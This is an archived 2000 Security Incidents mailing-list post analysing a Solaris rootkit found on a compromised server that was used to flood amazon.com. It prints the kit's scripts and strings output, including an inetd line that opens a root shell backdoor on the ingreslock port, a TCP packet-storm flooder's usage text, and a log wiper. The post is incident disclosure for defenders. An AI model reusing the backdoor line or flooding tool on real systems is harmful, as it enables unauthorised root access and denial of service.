Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Solaris DoS kit

From: Elias Levy <aleph1 () SECURITYFOCUS COM>
Date: Tue, 22 Aug 2000 12:35:29 -0700
[ This message is from an anonymous contributor ]

This was used by a btinternet user against www.amazon.com via one of our
Solaris 2.6 servers.  Expect they got in via an old sadmind vulnerability
which wasn't patched on a server which really should have been behind a
firewall.

Most of this is pretty uninteresting, wipe is just a utmp/wtmp wiper for
example.

The kit adds telnetd to /etc/inetd.conf, removes sadmind from /etc/rpc and
adds it to /etc/init.d/rpc and installs a bogus sadmind binary which is
used for denial of service attacks.

The DoS type is spoofed source random tcp-high to tcp-high on target host.

bash-2.01# tar tvf solkit.tar
- -rw-r--r--   0/0      109 Jul  1 08:50 2000 path.sh
- -rw-r--r--   0/0    34300 Jul 28 03:04 2000 sadmind
- -rw-r--r--   0/0      130 Jul  1 08:49 2000 secure.sh
- -rw-r--r--   0/0     6936 Jul  1 03:25 2000 set
- -rw-r--r--   0/0    29464 Jul 20 06:29 2000 stream
- -rw-r--r--   0/0    32560 Jul  1 03:25 2000 wipe
bash-2.01# cat path.sh
 PATH=/bin:/usr/bin:/usr/sbin:usr/ucb/bin:/usr/local/bin:/usr/opt/local/bin:/usr/ccs/bin:/opt/public/bin:. ;
bash-2.01# cat secure.sh
kill -9 ` ps -ef | grep "/inetd -s /tmp" | awk '{print $2} '`
kill -HUP `ps -ef | grep " /usr/sbin/inetd -s" | awk '{print $2} '`
bash-2.01# strings sadmind
- -csh
 fawking into background || coded by blazinweed || blazinweed () stoned com
socket
bind
listen
accept
%s %s %s %s %s
ld.so.1
wrong pass
/bin/echo '%s  stream  tcp     nowait  root    /bin/sh sh -i'>  /tmp/.h;/usr/sbin/inetd -s /tmp/.h &
ingreslock
PONG
Could not resolve %s.
jess
setsockopt
flooding target
bash-2.01# strings stream
Usage: %s <dstaddr> <dstport> <pktsize> <pps>
    dstaddr  - the target we are trying to attack.
    dstport  - the port of the target, 0 = random.
    pktsize  - the extra size to use.  0 = normal
syn.
Could not resolve %s.
jess
stream.c v1.0 - TCP Packet Storm
socket
setsockopt
Resolving IPs...
Sending...

----- End forwarded message -----

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
Previous By Date Next
Previous By Thread Next

Current thread: